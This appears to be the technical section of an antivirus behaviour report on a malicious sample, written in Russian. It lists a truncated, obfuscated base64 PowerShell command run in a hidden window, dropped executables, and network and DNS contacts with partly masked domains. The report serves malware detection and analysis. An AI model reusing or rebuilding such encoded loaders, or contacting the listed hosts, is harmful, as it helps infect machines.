Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMAZQB0AC0AaQB0AGUATQAgACgAIgB2ACIAKwAiAGEAIgArACIAUgBJAGEAYgBMAEUAOgAiACsAIgBGAGUAMgBzACIAKQAgACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADQAfQB7ADEAfQB7ADUAfQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1520
- %TEMP%\1197775.cvr
- %HOMEPATH%\q1bzpyx\eqe82rn\ifbusx1.exe
- 'am###pooh.com':80
- 'ha##le.net':80
- http://ha##le.net/
- DNS ASK no####refood.com
- DNS ASK am###pooh.com
- DNS ASK ha##le.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMAZQB0AC0AaQB0AGUATQAgACgAIgB2ACIAKwAiAGEAIgArACIAUgBJAGEAYgBMAEUAOgAiACsAIgBGAGUAMgBzACIAKQAgACAAKAAgAFsAdAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADQAfQB7ADEAfQB7ADUAfQ...' (со скрытым окном)